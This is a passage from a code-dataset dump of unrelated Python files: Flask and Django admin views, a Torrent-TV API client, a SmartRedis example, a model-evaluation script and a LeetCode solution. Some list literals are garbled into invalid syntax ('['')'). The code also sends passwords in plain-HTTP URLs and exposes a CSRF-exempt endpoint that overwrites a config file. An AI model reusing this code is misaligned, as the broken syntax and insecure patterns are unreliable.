form.weizhi.data = editdef.weizhi\n form.address.data = editdef.address\n return render_template('agent.html', form=form)\n # form = AgentForm()\n # if form.validate_on_submit():\n # info = Agent(name=form.name.data,\n # url=form.url.data,\n # logo=form.logo.data,\n # jianjie=form.jianjie.data,\n # weizhi=form.weizhi.data,\n # address=form.address.data)\n # db.session.add(info)\n # return redirect(url_for('.agentl'))\n # return render_template('agent.html', form=form)\n\n\n@main.route('/agentl')\ndef agentl():\n agents = Agent.query.order_by(Agent.id.desc()).all()\n return render_template('aglist.html', agents=agents)\n\n\n@main.route('/sch', methods=['GET', 'POST'])\ndef school():\n form = SchoolForm()\n cityidl = ['')\n cityid = ','.join(cityidl)\n\n if form.validate_on_submit():\n if form.id.data is None:\n info = School(name_ch=form.name_ch.data,\n name_en=form.name_en.data,\n city_id=form.city_id.data,\n website=form.website.data,\n number=form.number.data,\n xuefei=form.xuefei.data,\n zhusu=form.zhusu.data,\n canfei=form.canfei.data,\n jiangxuejin=form.jiangxuejin.data)\n else:\n info = School.query.get(form.id.data)\n info.name_ch = form.name_ch.data\n info.name_en = form.name_en.data\n info.city_id = form.city_id.data\n info.website = form.website.data\n info.number = form.number.data\n info.xuefei = form.xuefei.data\n info.zhusu = form.zhusu.data\n info.canfei = form.canfei.data\n info.jiangxuejin = form.jiangxuejin.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.schl'))\n schoolid = request.args.get('id')\n delc = request.args.get('del')\n if schoolid is None:\n form = SchoolForm(number=0, xuefei=0, zhusu=0, canfei=0, jiangxuejin=0)\n return render_template('School.html', form=form, citys=cityid)\n if delc == '1':\n editdef = School.query.get(schoolid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' % schoolid)\n return redirect(url_for('.schl'))\n else:\n editdef = School.query.get(schoolid)\n form.id.data = editdef.id\n form.name_ch.data = editdef.name_ch\n form.name_en.data = editdef.name_en\n cityv = 'value=' + editdef.city_id\n citya = cityid.replace(cityv, 'selected ' + cityv)\n form.website.data = editdef.website\n form.number.data = editdef.number\n form.xuefei.data = editdef.xuefei\n form.zhusu.data = editdef.zhusu\n form.canfei.data = editdef.canfei\n form.jiangxuejin.data = editdef.jiangxuejin\n return render_template('School.html', form=form, citys=citya)\n\n\n@main.route('/schl')\ndef schl():\n schools = School.query.order_by(School.id.desc()).all()\n return render_template('schlist.html', schools=schools)\n\n\n@main.route('/stu', methods=['GET', 'POST'])\ndef student():\n form = StudentForm()\n schoolidl = ['')\n schoolid = ','.join(schoolidl)\n\n agentidl = ['')\n agentid = ','.join(agentidl)\n\n if form.validate_on_submit():\n if form.id.data is None:\n info = Student(school_id=form.school_id.data,\n shenqing=form.shenqing.data,\n ptype=form.ptype.data,\n zhuanye=form.zhuanye.data,\n xueli=form.xueli.data,\n xuezhi=form.xuezhi.data,\n state=form.state.data,\n city=form.city.data,\n xuexiaoname=form.xuexiaoname.data,\n xuexiaotype=form.xuexiaotype.data,\n jiudunianji=form.jiudunianji.data,\n gpa=form.gpa.data,\n tofel=form.tofel.data,\n sat=form.sat.data,\n act=form.act.data,\n ielts=form.ielts.data,\n ap=form.ap.data,\n gaokao=form.gaokao.data,\n huodong=form.huodong.data,\n agent_id=form.agent_id.data,\n zhunbei=form.zhunbei.data)\n else:\n info = Student.query.get(form.id.data)\n info.school_id = form.school_id.data\n info.shenqing = form.shenqing.data\n info.ptype = form.ptype.data\n info.zhuanye = form.zhuanye.data\n info.xueli = form.xueli.data\n info.xuezhi = form.xuezhi.data\n info.state = form.state.data\n info.city = form.city.data\n info.xuexiaoname = form.xuexiaoname.data\n info.xuexiaotype = form.xuexiaotype.data\n info.jiudunianji = form.jiudunianji.data\n info.gpa = form.gpa.data\n info.tofel = form.tofel.data\n info.sat = form.sat.data\n info.act = form.act.data\n info.ielts = form.ielts.data\n info.ap = form.ap.data\n info.gaokao = form.gaokao.data\n info.huodong = form.huodong.data\n info.agent_id = form.agent_id.data\n info.zhunbei = form.zhunbei.data\n db.session.add(info)\n flash('数据提交成功!')\n return redirect(url_for('.stul'))\n Studentid = request.args.get('id')\n delc = request.args.get('del')\n if Studentid is None:\n form = StudentForm()\n return render_template('student.html', form=form, schools=schoolid, agents=agentid)\n if delc == '1':\n editdef = Student.query.get(Studentid)\n db.session.delete(editdef)\n db.session.commit()\n flash('id=%s 数据删除成功!' % Studentid)\n return redirect(url_for('.stul'))\n else:\n editdef = Student.query.get(Studentid)\n form.id.data = editdef.id\n schoolv = 'value=' + editdef.school_id\n schoola = schoolid.replace(schoolv, 'selected ' + schoolv)\n agentv = 'value=' + editdef.agent_id\n agenta = agentid.replace(agentv, 'selected ' + agentv)\n form.shenqing.data = editdef.shenqing\n form.ptype.data = editdef.ptype\n form.zhuanye.data = editdef.zhuanye\n form.xueli.data = editdef.xueli\n form.xuezhi.data = editdef.xuezhi\n form.state.data = editdef.state\n form.city.data = editdef.city\n form.xuexiaoname.data = editdef.xuexiaoname\n form.xuexiaotype.data = editdef.xuexiaotype\n form.jiudunianji.data = editdef.jiudunianji\n form.gpa.data = editdef.gpa\n form.tofel.data = editdef.tofel\n form.sat.data = editdef.sat\n form.act.data = editdef.act\n form.ielts.data = editdef.ielts\n form.ap.data = editdef.ap\n form.gaokao.data = editdef.gaokao\n form.huodong.data = editdef.huodong\n form.zhunbei.data = editdef.zhunbei\n return render_template('student.html', form=form, schools=schoola, agents=agenta)\n\n\n@main.route('/stul')\ndef stul():\n students = Student.query.order_by(Student.id.desc()).all()\n return render_template('stulist.html', students=students)\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"506153944","text":"# coding=utf-8\n\"\"\"\nTorrent-TV API communication class\nForms requests to API, checks result for errors and returns in desired form (lists or raw data)\n\"\"\"\n__author__ = 'miltador'\n\nimport urllib2\nimport socket\nimport random\nimport xml.dom.minidom as dom\nimport json\nimport logging\nimport time\nimport threading\n\nclass TorrentTvApiException(Exception):\n \"\"\"\n Exception from Torrent-TV API\n \"\"\"\n pass\n\n\nclass TorrentTvApi(object):\n CATEGORIES = {\n 1: 'Детские',\n 2: 'Музыка',\n 3: 'Фильмы',\n 4: 'Спорт',\n 5: 'Общие',\n 6: 'Познавательные',\n 7: 'Новостные',\n 8: 'Развлекательные',\n 9: 'Для взрослых',\n 10: 'Мужские',\n 11: 'Региональные',\n 12: 'Религиозные'\n }\n\n API_URL = 'http://1ttvapi.top/v3/'\n\n def __init__(self, email, password, maxIdle, zoneid='1'):\n self.email = email\n self.password = password\n self.maxIdle = maxIdle\n self.zoneid = zoneid\n self.session = None\n self.allTranslations = None\n self.lastActive = 0.0\n self.lock = threading.RLock()\n self.log = logging.getLogger(\"TTV API\")\n\n def auth(self):\n \"\"\"\n User authentication\n Returns user session that can be used for API requests\n\n :param email: user email string\n :param password: user password string\n :param raw: if True returns unprocessed data\n :return: unique session string\n \"\"\"\n with self.lock:\n if self.session and (time.time() - self.lastActive) < self.maxIdle:\n self.lastActive = time.time()\n self.log.debug(\"Reusing previous session: \" + self.session)\n return self.session\n\n self.log.debug(\"Creating new session\")\n self.session = None\n req = TorrentTvApi.API_URL + 'auth.php?typeresult=json&username=' + self.email + '&password=' + self.password + '&application=tsproxy&guid=' + str(random.randint(100000000,199999999))\n result = self._jsoncheck(json.loads(urllib2.urlopen(req, timeout=10).read()))\n self.session = result['session']\n self.lastActive = time.time()\n self.log.debug(\"New session created: \" + self.session)\n \n req = TorrentTvApi.API_URL + 'set_zone.php?session=' + self.session + '&zone=' + self.zoneid\n result = self._jsoncheck(json.loads(urllib2.urlopen(req, timeout=10).read()))\n self.log.debug(\"HTTP streaming ZoneID set to : \" + self.zoneid) \n \n return self.session\n\n def translations(self, translation_type, raw=False):\n \"\"\"\n Gets list of translations\n Translations are basically TV channels\n\n :param session: valid user session required\n :param translation_type: playlist type, valid values: all|channel|moderation|translation|favourite\n :param raw: if True returns unprocessed data\n :return: translations list\n \"\"\"\n \n query = '&type=' + translation_type\n if raw:\n try:\n res = self._xmlresult('translation_list.php', query)\n self._checkxml(res)\n return res\n except TorrentTvApiException:\n res = self._xmlresult('translation_list.php', query)\n self._checkxml(res)\n return res\n else:\n res = self._checkedxmlresult('translation_list.php', query)\n return res.getElementsByTagName('channel')\n\n def records(self, channel_id, date, raw=False):\n \"\"\"\n Gets list of available record for given channel and date\n\n :param session: valid user session required\n :param channel_id: id of channel in channel list\n :param date: format %d-%m-%Y\n :param raw: if True returns unprocessed data\n :return: records list\n \"\"\"\n date = date.replace('-0', '-')\n\n if raw:\n try:\n res = self._xmlresult('arc_records.php', '&epg_id=' + channel_id + '&date=' + date)\n self._checkxml(res)\n return res\n except TorrentTvApiException:\n res = self._xmlresult('arc_records.php', '&epg_id=' + channel_id + '&date=' + date)\n self._checkxml(res)\n return res\n else:\n res = self._checkedxmlresult('arc_records.php', '&epg_id=' + channel_id + '&date=' + date)\n return res.getElementsByTagName('channel')\n\n def archive_channels(self, raw=False):\n \"\"\"\n Gets the channels list for archive\n\n :param session: valid user session required\n :param raw: if True returns unprocessed data\n :return: archive channels list\n \"\"\"\n\n if raw:\n try:\n res = self._xmlresult('arc_list.php', '')\n self._checkxml(res)\n return res\n except TorrentTvApiException:\n res = self._xmlresult('arc_list.php', '')\n self._checkxml(res)\n return res\n else:\n res = self._checkedxmlresult('arc_list.php', '')\n return res.getElementsByTagName('channel')\n\n def stream_source(self, channel_id):\n \"\"\"\n Gets the source for Ace Stream by channel id\n\n :param session: valid user session required\n :param channel_id: id of channel in translations list (see translations() method)\n :return: type of stream and source and translation list\n \"\"\"\n\n res = self._checkedjsonresult('translation_stream.php', '&channel_id=' + channel_id)\n stream_type = res['type']\n source = res['source']\n allTranslations = self.allTranslations\n if not allTranslations:\n self.allTranslations = allTranslations = self.translations('all')\n return stream_type.encode('utf-8'), source.encode('utf-8'), allTranslations\n\n def archive_stream_source(self, record_id):\n \"\"\"\n Gets stream source for archive record\n\n :param session: valid user session required\n :param record_id: id of record in records list (see records() method)\n :return: type of stream and source\n \"\"\"\n\n res = self._checkedjsonresult('arc_stream.php', '&record_id=' + record_id)\n stream_type = res['type']\n source = res['source']\n return stream_type.encode('utf-8'), source.encode('utf-8')\n\n def _jsoncheck(self, jsonresult):\n \"\"\"\n Validates received API answer\n Raises an exception if error detected\n\n :param jsonresult: API answer to check\n :return: minidom-parsed xmlresult\n :raise: TorrentTvApiException\n \"\"\"\n success = jsonresult['success']\n if success == '0' or not success:\n error = jsonresult['error']\n raise TorrentTvApiException('API returned error: ' + error)\n return jsonresult\n\n def _checkxml(self, xmlresult):\n \"\"\"\n Validates received API answer\n Raises an exception if error detected\n\n :param xmlresult: API answer to check\n :return: minidom-parsed xmlresult\n :raise: TorrentTvApiException\n \"\"\"\n res = dom.parseString(xmlresult).documentElement\n success = res.getElementsByTagName('success')[0].firstChild.data\n if success == '0' or not success:\n error = res.getElementsByTagName('error')[0].firstChild.data\n raise TorrentTvApiException('API returned error: ' + error)\n return res\n\n def _checkedjsonresult(self, request, params):\n try:\n return self._jsoncheck(self._jsonresult(request, params))\n except TorrentTvApiException:\n self._resetSession()\n return self._jsoncheck(self._jsonresult(request, params))\n\n def _checkedxmlresult(self, request, params):\n try:\n return self._checkxml(self._xmlresult(request, params))\n except TorrentTvApiException:\n self._resetSession()\n return self._checkxml(self._xmlresult(request, params))\n\n def _jsonresult(self, request, params):\n \"\"\"\n Sends request to API and returns the result in form of string\n\n :param request: API command string\n :return: result of request to API\n :raise: TorrentTvApiException\n \"\"\"\n try:\n req = TorrentTvApi.API_URL + request + '?session=' + self.auth() + '&typeresult=json' + params\n self.log.debug(req)\n result = urllib2.urlopen(req, timeout=10).read()\n return json.loads(result)\n except (urllib2.URLError, socket.timeout) as e:\n raise TorrentTvApiException('Error happened while trying to access API: ' + repr(e))\n\n def _xmlresult(self, request, params):\n \"\"\"\n Sends request to API and returns the result in form of string\n\n :param request: API command string\n :return: result of request to API\n :raise: TorrentTvApiException\n \"\"\"\n try:\n req = TorrentTvApi.API_URL + request + '?session=' + self.auth() + '&typeresult=xml' + params\n self.log.debug(req)\n result = urllib2.urlopen(req, timeout=10).read()\n return result\n except (urllib2.URLError, socket.timeout) as e:\n raise TorrentTvApiException('Error happened while trying to access API: ' + repr(e))\n\n def _resetSession(self):\n with self.lock:\n self.session = None\n self.allTranslations = None\n self.auth()\n","sub_path":"plugins/torrenttv_api.py","file_name":"torrenttv_api.py","file_ext":"py","file_size_in_byte":9703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"638412813","text":"import numpy as np\n\nfrom smartredis import Client, Dataset\n\n# Create two arrays to store in the DataSet\ndata_1 = np.random.randint(-10, 10, size=(10,10))\ndata_2 = np.random.randint(-10, 10, size=(20, 8, 2))\n\n# Create a DataSet object and add the two sample tensors\ndataset = Dataset(\"test-dataset\")\ndataset.add_tensor(\"tensor_1\", data_1)\ndataset.add_tensor(\"tensor_2\", data_2)\n\n# Connect SmartRedis client to Redis database\ndb_address = \"127.0.0.1:6379\"\nclient = Client(address=db_address, cluster=False)\n\n# Place the DataSet into the database\nclient.put_dataset(dataset)\n\n# Retrieve the DataSet from the database\nrdataset = client.get_dataset(\"test-dataset\")\n\n# Retrieve a tensor from inside of the fetched\n# DataSet\nrdata_1 = rdataset.get_tensor(\"tensor_1\")","sub_path":"examples/serial/python/example_put_get_dataset.py","file_name":"example_put_get_dataset.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"541802523","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\n#from django.shortcuts import render\n\n# Create your views here.\n\nfrom django.shortcuts import render,HttpResponse\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nimport threading\nimport json,sys,time\nimport datetime\nimport time\nimport os\nimport operator\nimport json\n\n# Create your views here.\n#def home(request):\n #return render(request,'home.html')\n\n#读取log文件\ndef readlogs():\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\info.log')\n \n f = open(file_path)\n\n dicList = {} \n fileList = f.readlines() \n \n i = 0\n for fileLine in fileList: \n dicList[i] = fileLine\n i = i + 1\n f.close()\n \n return dicList\n\ndef getOldErrorNumber():\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\errorNumber.txt')\n \n f = open(file_path)\n\n oldNumber = f.read();\n \n f.close()\n return oldNumber\n\ndef getNewErrorNumber():\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\info.log')\n f = open(file_path)\n\n dicList = {} \n fileList = f.readlines() \n \n i = 0\n for fileLine in fileList: \n dicList[i] = fileLine\n i = i + 1\n f.close()\n \n select = \"ERROR\"\n i = 0\n for key , value in dicList.items():\n if select in value:\n i = i + 1;\n \n return i\ndef setErrorNumber():\n\n newNumber = getNewErrorNumber()\n\n Number = str(newNumber)\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\errorNumber.txt')\n f = open(file_path,'w')\n f.write(Number)\n f.close()\n\n \ndef load(request):\n\n if request.method == 'GET':\n offset = request.GET['offset']\n size = request.GET['size']\n\n value_split = [] \n dicList_list = []\n loadData = {}\n \n #获取所有日志信息\n dicList = readlogs()\n \n\n #将日志信息按key值逆序\n \n file_list_rev = sorted(dicList.items(), key=lambda x:x[0], reverse=True)\n\n \n\n #将列表转化成字典\n \n dic_list_rev = dict(file_list_rev) \n \n counter = 0\n for key in dic_list_rev.keys():\n counter = counter + 1\n\n startIndex = counter-int(offset) - 1\n endIndex = startIndex - int(size)\n #if int(counter) <= int(size):\n #startIndex = counter - 1\n #endIndex = -1\n #else:\n #startIndex = counter-int(offset) - 1\n #endIndex_re = startIndex - int(size)\n #if int(startIndex) < int(size):\n #endIndex = -1\n #else:\n # endIndex = endIndex_re\n print(counter)\n print(startIndex)\n print(endIndex)\n\n \n #根据offset 和 size 读取要增加显示的日志\n j = 0\n for key , value in file_list_rev:\n dicList_display = {}\n if int(key) <= startIndex and int(key) > endIndex:\n\n value_split.append(value.split('-'))\n dicList_display['date'] = value_split[j][0] +'-' +value_split[j][1] +'-'+ value_split[j][2]\n dicList_display['location'] = value_split[j][3]\n #dicList_display['type'] = value_split[j][3] + value_split[j][4]\n dicList_display['type'] = value_split[j][4]\n dicList_display['content'] = value_split[j][5]\n dicList_list.append(dicList_display)\n j = j + 1\n print(dicList_display['date']) \n \n\n loadData['data'] = dicList_list\n\n \n loadData['number'] = counter\n\n #警告判断\n alarm = False\n oldNumber = getOldErrorNumber()\n newNumber = getNewErrorNumber()\n \n if int(newNumber) > int(oldNumber):\n alarm = True\n\n loadData['alarm'] = alarm\n \n setErrorNumber()\n \n \n\n return JsonResponse(loadData)\n\n#首页展示\ndef home(request):\n\n \n return render(request, 'home.html')\n\n#搜索\ndef search (request):\n\n dicList = {}\n list_search = []\n search_display = []\n search_all = {}\n search_error = {}\n search_result = {}\n dicList_list = []\n value_split = []\n if request.method == 'POST':\n date_start = request.POST['start']\n date_end = request.POST['end']\n select = request.POST['choice']\n offset = request.POST['pageStart']\n size = request.POST['pageSize']\n\n #获取所有日志信息\n dicList_search = readlogs()\n\n j = 0 \n for key,value in dicList_search.items():\n \n start_date_strp = time.mktime(time.strptime(date_start,'%Y-%m-%d %H:%M:%S' ))\n end_date_strp = time.mktime(time.strptime(date_end,'%Y-%m-%d %H:%M:%S' ))\n #获取All信息\n if select == \"ALL\":\n date_str = value[0:19] \n date_strp = time.mktime(time.strptime(date_str,'%Y-%m-%d %H:%M:%S' ))\n if date_strp >= start_date_strp and date_strp <= end_date_strp:\n search_all[j] = value \n j = j + 1\n\n #获取查询所有的Error信息\n if select in value:\n date_str = value[0:19] \n date_strp = time.mktime(time.strptime(date_str,'%Y-%m-%d %H:%M:%S' ))\n \n if date_strp >= start_date_strp and date_strp <= end_date_strp:\n search_error[j] = value \n j = j + 1\n\n #将search到all日志信息按key值逆序\n search_all_list = sorted(search_all.items(), key=lambda d:d[0], reverse=True)\n #将列表转化成字典\n search_all_rev = dict(search_all_list)\n \n #将search 到的ERROR日志信息按key值逆序\n search_error_list = sorted(search_error.items(), key=lambda d:d[0], reverse=True)\n #将列表转化成字典\n search_error_rev = dict(search_error_list)\n \n #获取按时间查询到的All总数\n searchAllCounter = 0\n for key in search_all_list:\n searchAllCounter = searchAllCounter + 1\n\n #获取按时间查询到的ERROR总数\n searchErrorCounter = 0\n for key in search_error_list:\n searchErrorCounter = searchErrorCounter + 1\n\n if select == \"ALL\":\n if int(searchAllCounter) <= int(size):\n startIndex = searchAllCounter - 1\n endIndex = -1\n else:\n startIndex = searchAllCounter-int(offset) - 1\n endIndex_re = startIndex - int(size)\n if int(startIndex) < int(size):\n endIndex = -1\n else:\n endIndex = endIndex_re\n\n if select == \"ERROR\":\n if int(searchErrorCounter) <= int(size):\n startIndex = searchAllCounter - 1\n endIndex = -1\n else:\n startIndex = searchErrorCounter-int(offset) - 1\n endIndex_re = startIndex - int(size)\n if int(startIndex) < int(size):\n endIndex = -1\n else:\n endIndex = endIndex_re\n \n print(searchAllCounter)\n print(searchErrorCounter)\n print(startIndex)\n print(endIndex)\n \n if select == \"ALL\":\n d = 0\n for key , value in search_all_list:\n dicList_display = {}\n if int(key) <= startIndex and int(key) > endIndex:\n\n value_split.append(value.split('-'))\n dicList_display['date'] = value_split[d][0] +'-' +value_split[d][1] +'-'+ value_split[d][2]\n dicList_display['location'] = value_split[d][3]\n #dicList_display['type'] = value_split[d][3] + value_split[d][4]\n dicList_display['type'] = value_split[d][4]\n dicList_display['content'] = value_split[d][5]\n dicList_list.append(dicList_display)\n d = d + 1\n search_result['data'] = dicList_list\n search_result['number'] = searchAllCounter\n\n if select == \"ERROR\":\n d = 0\n for key , value in search_error_list:\n dicList_display = {}\n if int(key) <= startIndex and int(key) > endIndex:\n\n value_split.append(value.split('-'))\n dicList_display['date'] = value_split[d][0] +'-' +value_split[d][1] +'-'+ value_split[d][2]\n dicList_display['location'] = value_split[d][3]\n #dicList_display['type'] = value_split[d][3] + value_split[d][4]\n dicList_display['type'] = value_split[d][4]\n dicList_display['content'] = value_split[d][5]\n dicList_list.append(dicList_display)\n d = d + 1\n\n search_result['data'] = dicList_list\n search_result['number'] = searchErrorCounter\n \n \n #将列表转化成字典\n #print(search_display)\n \n return JsonResponse(search_result)\n #AJax响应List数据\n #return HttpResponse(json.dumps(search_display), content_type='application/json')\n\n\n#读取配置文件\n\ndef readconf (request):\n\n \n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\conf\\config.json')\n \n #with open(file_path,\"r\") as f:\n #temp = json.dumps(f.read())\n f = file(file_path)\n temp = json.load(f)\n return render(request, 'readconf.html',{'data':temp})\n\ndef modifyconf(request):\n\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\conf\\config.json')\n \n #with open(file_path,\"r\") as f:\n #temp = json.dumps(f.read())\n f = file(file_path)\n temp = json.load(f)\n return render(request, 'modifyconf.html',{'data':temp})\n\n@csrf_exempt\n\ndef modify (request):\n\n data = json.loads(request.body)\n #data1 = json.loads(request.body.decode())\n #data = request.POST.get(\"samba\")\n #data2 = request.POST.get(\"expire\")\n #expire = json.loads(request.POST.['expire'])\n module_dir = os.path.dirname(__file__)\n file_path = os.path.join(module_dir,'static\\info\\conf\\config.json')\n \n print(data)\n with open(file_path,\"w\") as f:\n json.dump(data,f)\n\n return HttpResponse('修改成功!');","sub_path":"Single_data_upload_alarm_system/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"78559036","text":"# This script loads test data and a trained pytorch model. itthe makes the following plots:\n\n# - LOSS OF EACH SAMPLE\n# - RELATIVE ERROR AND ERROR FOR EACH AXIS OVER TIME\n# - P_PRED AND P_TRUTH FOR SINGLE SAMPLE\n\n# In the end an estimated p value with a random target is simulated to get a y and\n# compared to the simulated y of the p retreived from trajectory optimization.\n\n##########################################\n#LOAD LIBRARIES\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport time\nimport matplotlib.pyplot as plt\nimport json\nimport pydde as d\nimport os\n\n########################################\n#PARAMETERS\ntime_length = 60 #seconds\nhiddenlayers = [100]\nsamples_per_file = 1000\ndata_file_path = '../Data/Samples/data_20k_2x2x2/test_data/'\ncriterion = nn.SmoothL1Loss() # Huber Loss\nmodel_file_path = '../Trained_Models/Model_latest.pt'\nmodel_statedict_file_path = '../Trained_Models/state_dict/Model_statedict_latest.pt'\n\n#########################################\n#LOAD SAMPLES\nnumber_of_files = len(os.listdir(data_file_path))\nnumber_of_samples = samples_per_file*number_of_files\np = np.zeros((3*time_length, number_of_samples))\ny_target = np.zeros((number_of_samples, 3))\ngradnorm_truth = np.zeros(number_of_samples)\niterations_truth = np.zeros(number_of_samples)\nloss_truth = np.zeros(number_of_samples)\n\nfor filenum in range(number_of_files):\n with open(data_file_path + f'data_{filenum}.json') as json_file:\n data = json.load(json_file)\n filesize = len(data['y_target'])\n for i, p_i in enumerate(data['parameter']):\n p[:, filenum*filesize+i] = np.array(p_i)\n for s, y_s in enumerate(data['y_target']):\n y_target[filenum*filesize+s, :] = np.array(y_s)\n for i, truth in enumerate(data['loss']):\n loss_truth[filenum*filesize+i] = np.array(truth)\n for i, truth in enumerate(data['iterations']):\n iterations_truth[filenum*filesize+i] = np.array(truth)\n for i, truth in enumerate(data['loss']):\n gradnorm_truth[filenum*filesize+i] = np.array(truth)\np = p.transpose()\nprint(f'Shape of y_target: {y_target.shape}')\nprint(f'Shape of p: {p.shape}')\n\ny_test = torch.tensor(y_target).float()\np_test = torch.tensor(p).float()\n\n#########################################\n#LOAD MODEL\nclass PassiveLearn(nn.Module):\n\n def __init__(self, n_in, out_sz):\n super(PassiveLearn, self).__init__()\n\n self.L_in = nn.Linear(n_in, hiddenlayers[0])\n self.H1 = nn.Linear(hiddenlayers[0], 3*time_length)\n self.L_out = nn.Linear(3*time_length, 3*time_length)\n self.Relu = nn.ReLU(inplace=True)\n self.drop = nn.Dropout(p=0.5)\n \n def forward(self, input):\n x = self.L_in(input)\n x = self.Relu(x)\n x = self.H1(x)\n x = self.Relu(x)\n x = self.L_out(x)\n return x\n\nmodel = PassiveLearn(3, 180)\nmodel.load_state_dict(torch.load(model_statedict_file_path))\n#model = torch.load(model_file_path)\n\n#########################################\n#TEST THE DATA\nlosses_test= []\nwith torch.no_grad():\n for i in range(number_of_samples):\n p_val = model(y_test[i, :])\n loss = criterion(p_val,p_test[i,:])\n losses_test.append(loss.clone().numpy())#Test the data\n\n#########################################\n#PLOT LOSS OF EACH SAMPLE\nplt.figure(figsize = [12,6])\nloss_test = plt.plot(losses_test, label = 'loss')\nplt.legend()\nplt.ylabel('error')\nplt.xlabel('sample')\nplt.show()\ntot_error = sum(losses_test)\nprint(tot_error)\n\n#########################################\n#CALCULATE RELATIVE AND ABSOLUTE ERROR OF EACH AXIS\nrel_errors_norm = []\nwith torch.no_grad():\n for i in range(number_of_samples):\n p_val = model(y_test[i, :])\n p_truth = p_test[i,:]\n rel_error = np.linalg.norm((p_val - p_truth)/p_truth)\n rel_errors_norm.append(rel_error)\n\nrel_errors_sum = torch.zeros(180)\nabs_errors_sum = torch.zeros(180)\nwith torch.no_grad():\n for i in range(number_of_samples):\n p_val = model(y_test[i, :])\n p_truth = p_test[i,:]\n rel_error = (p_val - p_truth)/p_truth\n abs_error = np.abs(p_val - p_truth)\n rel_errors_sum = rel_errors_sum + rel_error\n abs_errors_sum = abs_errors_sum + abs_error\nx_err_rel = rel_errors_sum[0::3]/(number_of_samples)\ny_err_rel = rel_errors_sum[1::3]/(number_of_samples)\nz_err_rel = rel_errors_sum[2::3]/(number_of_samples)\n\nx_err = abs_errors_sum[0::3]/(number_of_samples)\ny_err = abs_errors_sum[1::3]/(number_of_samples)\nz_err = abs_errors_sum[2::3]/(number_of_samples)\n\n#########################################\n#PLOT RELATIVE ERROR AND ERROR FOR EACH AXIS OVER TIME\nplt.figure(figsize = [10,10])\n#plt.suptitle('Errors using 5000 samples', fontsize=16)\n\nplt.subplot(2, 1, 2)\nplt.plot(x_err_rel, label = 'x-axis')\nplt.plot(y_err_rel, label = 'y-axis')\nplt.plot(z_err_rel, label = 'z-axis')\nplt.xlabel('time (ms)')\nplt.title('relative error of each axis over time')\nplt.legend()\n\nplt.subplot(2, 1, 1)\nplt.plot(x_err, label = 'x-axis')\nplt.plot(y_err, label = 'y-axis')\nplt.plot(z_err, label = 'z-axis')\nplt.xlabel('time (ms)')\nplt.title('mean absolute error of each axis over time')\nplt.legend()\nplt.show()\n\n#############################################\n#PLOT P_PRED AND P_TRUTH FOR SINGLE SAMPLE\nrandomsample = 9\nwith torch.no_grad():\n p_val = model(y_test[randomsample, :])\n p_truth = p_test[randomsample,:]\n x_val = p_val[0::3]\n y_val = p_val[1::3]\n z_val = p_val[2::3]\n x_truth = p_truth[0::3]\n y_truth = p_truth[1::3]\n z_truth = p_truth[2::3]\n \n\nplt.figure(figsize = [12,6])\nplt.plot(x_val, label = 'x-axis')\nplt.plot(y_val, label = 'y-axis')\nplt.plot(z_val, label = 'z-axis')\nplt.plot(x_truth, '--', label = 'true x-axis')\nplt.plot(y_truth, '--', label = 'true y-axis')\nplt.plot(z_truth, '--', label = 'true z-axis')\nplt.title('p_pred and p_truth for a single sample')\nplt.xlabel('timestep')\nplt.legend()\nplt.show()\n\n#####################################################\n#TEST THE MODEL\n\n# Generate simulation\ndyn = d.PyDyn('../Data/point-mass_pendulum.sim', time_length)\nstate_init = dyn.compute(dyn.p_init)\nf = dyn.f(state_init, dyn.p_init)\ndf = dyn.df_dp(state_init, dyn.p_init)\ndy = dyn.dy_dp(state_init, dyn.p_init)\n\ny_target_test_= torch.tensor([0.5, 1.5, 0.5])\np_ = model(y_target_test_)\ny_target_ = y_target_test_.detach().numpy()\np_ = p_.detach().numpy()\np_truth_ = dyn.get_p(y_target_, dyn.p_init)\n\nyTraj_test_ = dyn.compute(p_)\nyTraj_truth_ = dyn.compute(p_truth_)\n\nprint('TEST OF THE MODEL')\nprint(f'\\ntest for y_target:\\n {y_target_test_}')\nprint(f'\\nevaluated y_end:\\n {yTraj_test_.y[-3:]}')\nprint(f'\\nsimulated traj_opt y_end with p_truth:\\n {yTraj_truth_.y[-3:]}')\nprint(f'\\ndifference of y_end:\\n {np.sum(yTraj_test_.y[-3:]-y_target_)}')\nprint(f'\\nlast 6 entries of p predicted:\\n {p_[-6:].transpose()}')\nprint(f'\\nlast 6 entries of p from traj_opt:\\n {p_truth_[-6:].transpose()}')","sub_path":"Python_Files/ML_Evaluation_and_Plots.py","file_name":"ML_Evaluation_and_Plots.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"571107779","text":"class Solution(object):\n def merge(self, nums1, m, nums2, n):\n \"\"\"\n :type nums1: List[int]\n :type m: int\n :type nums2: List[int]\n :type n: int\n :rtype: void Do not return anything, modify nums1 in-place instead.\n \"\"\"\n while n >= 1:\n nums1.remove(0)\n n -= 1\n for i in nums2:\n nums1.append(i)\n nums1 = nums1.sort()\n","sub_path":"merge_sorted_array.py","file_name":"merge_sorted_array.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"248202033","text":"from __future__ import 